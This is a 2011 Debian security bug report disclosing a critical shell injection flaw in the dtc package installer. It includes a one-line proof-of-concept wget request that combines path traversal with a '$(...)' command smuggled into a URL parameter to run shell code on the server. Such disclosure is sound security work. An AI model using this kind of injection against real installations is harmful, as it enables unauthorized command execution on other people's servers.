Ansgar Burchardt
2011-Aug-13 09:00 UTC
[Secure-testing-team] Bug#637630: shell injection in package installer
Package: src:dtc Version: 0.32.10-2 Severity: critical Tags: security upstream The package installer helpfully allows users to run shell code: wget -q -O- ''http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'' Ansgar